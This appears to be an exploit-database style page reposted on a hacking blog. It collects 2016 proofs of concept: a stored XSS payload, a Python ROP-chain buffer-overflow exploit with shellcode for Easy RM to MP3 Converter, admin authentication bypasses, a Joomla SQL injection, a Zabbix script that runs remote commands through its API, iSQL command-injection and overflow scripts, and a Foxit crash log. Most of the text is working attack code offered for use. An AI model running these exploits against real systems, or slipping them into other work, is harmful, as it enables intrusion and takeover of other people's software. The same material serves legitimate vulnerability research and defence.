# Exploit Title: FRticket - Ticket System - Stored XSS
# Google Dork: [if applicable]
# Date: 11.06.2016
# Exploit Author: Hamit ABİŞ
# Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836
# Version: v1
#########################################################################################################
About
Get the world’s most popular customer support ticket system. FRticket is basically a management of enquiries between customers , agents and admins
Features:
- Admin Panel Dashboard
- Email Templates
- Agent Assignment
- Status Management
- Priority Management
- Categories Management
- And More Coming Soon…
#########################################################################################################
##########################################################################################################
Proof of Concept - Stored Ticket Title
POST /ticket/public/ticket HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Connection: keep-alive
_token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=<svg onload=prompt(1)>&priority=2&category=2&description=somecomments
##########################################################################################################
Twitter: https://twitter.com/sar1nz
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863287830
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # RETN
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc24, # ADD EAX,80 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc41, # ADD EAX,40 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
# AT this point EAX = 0x1000
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
0x41414141, # Filler (compensate)
0x10026d56, # POP EAX # RETN [MSRMfilter03.dll]
0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll]
0x1001b058, # & push esp # ret [MSRMfilter03.dll]
0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll]
0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10029f74, # POP ECX # RETN [MSRMfilter03.dll]
0xffffffff, #
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll]
0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]
0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll]
0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
buffersize = 26090
junk = "A" * buffersize
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN
rop = create_rop_chain()
calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
shell = "\x90"*0x10 + calc
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()
<!--
# Exploit Title: Dream Gallery 2.0 - Admin panel Authentication bypass
# Date: 13th June 2016
# Exploit Author: Ali BawazeEer
# Vendor Homepage: http://phpstaff.com.br/
# Version: 2.0
--!>
=======================================================================================================
Dream Gallery 2.0 Admin panel Authentication bypass
Description : An Attackers are able to completely compromise the web application built upon
Dream Gallery as they can gain access to the admin panel and
manage the website as an admin without prior authentication!
Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
Step 2: Access http://example.com/path/admin/index.php
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including content change,add admin user .. etc
=======================================================================================================
potential fix
<?php
session_start();
if (!isset($_SESSION["auth"])) {
exit(header('Location: admin/login.php'));
}
?>
[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
<!--
# Exploit Title: Grid Gallery 1.0 - Admin panel Authentication bypass
# Date: 13th June 2016
# Exploit Author: Ali BawazeEer
# Vendor Homepage: http://phpstaff.com.br/
# Version: 2.0
--!>
=======================================================================================================
Grid Gallery 1.0 Admin panel Authentication bypass
Description : An Attackers are able to completely compromise the web application built upon
Grid Gallery as they can gain access to the admin panel and
manage the website as an admin without prior authentication!
Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
Step 2: Access http://example.com/path/admin/index.php
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including content change,add admin user .. etc
=======================================================================================================
potential fix
<?php
session_start();
if (!isset($_SESSION["auth"])) {
exit(header('Location: admin/login.php'));
}
?>
[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
######################
# Exploit Title : Joomla com_payplans - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/payplans
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.3.6
# Date: 2016/06/08
######################
#
# PoC:
# group_id Parameter Vulnerable To SQL
# Demo :
# http://server/index.php?option=com_payplans&group_id=4%27
# Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk
######################
# Discovered by : Mojtaba MobhaM
# Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A
import requests
import json
import readline
ZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address
url = ZABIX_ROOT + '/api_jsonrpc.php' ### Don't edit
login = 'Admin' ### Zabbix login
password = 'zabbix' ### Zabbix password
hostid = '10084' ### Zabbix hostid
### auth
payload = {
"jsonrpc" : "2.0",
"method" : "user.login",
"params": {
'user': ""+login+"",
'password': ""+password+"",
},
"auth" : None,
"id" : 0,
}
headers = {
'content-type': 'application/json',
}
auth = requests.post(url, data=json.dumps(payload), headers=(headers))
auth = auth.json()
while True:
cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
if cmd == "" : print "Result of last command:"
if cmd == "quit" : break
### update
payload = {
"jsonrpc": "2.0",
"method": "script.update",
"params": {
"scriptid": "1",
"command": ""+cmd+""
},
"auth" : auth['result'],
"id" : 0,
}
cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))
### execute
payload = {
"jsonrpc": "2.0",
"method": "script.execute",
"params": {
"scriptid": "1",
"hostid": ""+hostid+""
},
"auth" : auth['result'],
"id" : 0,
}
cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
cmd_exe = cmd_exe.json()
print cmd_exe["result"]["value"]
#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Shell Command Injection
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
:: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable
:: don't filtering special characters in str value
446 char *get_MD5(char *str){
447 FILE *stream;
448 char *buf=malloc(sizeof(char)*33);
449 char cmd[100];
450 memset(buf,'\0',sizeof(buf));
451 memset(cmd,'\0',sizeof(cmd));
452 strcpy(cmd,"echo "); //5
453 strcpy((char *)cmd+5,str);
454 strcpy((char *)cmd+5+strlen(str)," | md5sum");
455 stream=popen(cmd,"r");
456 fread(buf,sizeof(char),32,stream);
457 // printf("%s\n",buf);
458 return buf;
459 }
### Vulnerability Triger
614 while (USER_NUM==-1){
615 printf(">username:");
616 scanf("%s",username);
617 printf(">password:");
618 scanf("%s",passwd);
619 md5=get_MD5(passwd);
### Vulnerability Run
>username:asdf;
>password:asdf;top;echo 1
(~) #> ps -aux | grep top
root 13279 0.0 0.0 4472 860 pts/1 S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum
root 13280 0.3 0.0 26304 3200 pts/1 S+ 13:33 0:00 top
=end
### Attack command
#> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql
### Ruby Code
puts "SQL 1.0 - Shell Command Injection"
puts "by hahwul"
if(ARGV.size != 1)
puts "Usage: ruby iSQL_command_injection.rb [COMMAND]"
puts " need ./isql in same directory"
exit()
else
puts "CMD :: "+ARGV[0]
puts "Run Injection.."
system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql")
end
### Sample Output
=begin
#> ruby test.rb nc
# Exploit Title: iSQL 1.0 Shell Command Injection
by hahwul
CMD :: nc
Run Injection..
*************** welcome to ISQL ****************
* version 1.0 *
* Designed by RL *
* Copyright (c) 2011, RL. All rights reserved *
************************************************
>username:>password:verify failure , try again !
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
>username:>password:verify failure , try again !
^Ctest.rb:10:in `system': Interrupt
from test.rb:10:in `<main>'
=end
#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c)
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
:: [isql_main.c 453 line] strcpy((char *)cmd+5,str); code is vulnerable
:: don't check str size
446 char *get_MD5(char *str){
447 FILE *stream;
448 char *buf=malloc(sizeof(char)*33);
449 char cmd[100];
450 memset(buf,'\0',sizeof(buf));
451 memset(cmd,'\0',sizeof(cmd));
452 strcpy(cmd,"echo "); //5
453 strcpy((char *)cmd+5,str);
Edit makefile > CFLAGS = -fno-stack-protector
#> make
### gdb history
(gdb) r
Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql
*************** welcome to ISQL ****************
* version 1.0 *
* Designed by RL *
* Copyright (c) 2011, RL. All rights reserved *
************************************************
>username: hwul_test
>password: AAAAAAAAAAAAAAAAAAAAAAAAAA... ("A" * 800)
Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 ()
(gdb) x/s $rax
0x4141414141414141: <error: Cannot access memory at address 0x4141414141414141>
(gdb) x/s $rbp
0x4141414141414141: <error: Cannot access memory at address 0x4141414141414141>
### Registers
(gdb) i r
rax 0x4141414141414141 4702111234474983745
rbx 0x0 0
rcx 0x7ffff7b06480 140737348920448
rdx 0x0 0
rsi 0x60b610 6338064
rdi 0x5 5
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe948 0x7fffffffe948
r8 0xffffffff 4294967295
r9 0x0
=end
puts "iSQL 1.0 - Buffer Overflow"
puts " - by hahwul"
puts " - Run BUG.."
buffer = "A"*800
system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql")
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=741
We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
*** Error in `FoxitReader': free(): invalid pointer: 0x0000000001930a60 ***
[New Thread 0x7fffdfa16700 (LWP 26721)]
[New Thread 0x7fffe0217700 (LWP 26720)]
[New Thread 0x7fffe0a18700 (LWP 26718)]
[New Thread 0x7fffe97cd700 (LWP 26717)]
Program received signal SIGABRT, Aborted.
0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0 0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff4fc40a8 in __GI_abort () at abort.c:89
#2 0x00007ffff4ffd2f4 in __libc_message (do_abort=do_abort@entry=1,
fmt=fmt@entry=0x7ffff510b988 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff500bef6 in malloc_printerr (ptr=<optimized out>,
str=0x7ffff5107a79 "free(): invalid pointer", action=1) at malloc.c:4996
#4 free_check (mem=<optimized out>, caller=<optimized out>) at hooks.c:298
#5 0x00000000007c823f in CPDF_StreamContentParser::~CPDF_StreamContentParser() ()
#6 0x00000000007c9504 in CPDF_ContentParser::Continue(IFX_Pause*, int) ()
#7 0x00000000007b97d9 in CPDF_PageObjects::ContinueParse(IFX_Pause*) ()
#8 0x000000000047a8b4 in CReader_PageEx::ParsePage (this=0x191f7e0)
at ../../Readerlite/ReaderLite/src/frd_pageex.cpp:792
#9 0x0000000000490415 in CPDFViewerContentProvider::ParsePage (this=0x191ea60, nPage=0)
at ../../Readerlite/ReaderLite/src/pdfviewercontentprovider.cpp:23
#10 0x000000000061da5f in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#11 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#12 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#13 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#14 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191efe0)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#15 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#16 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#17 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#18 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#19 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#20 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#21 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#23 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#41 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#42 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#43 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#44 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#45 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
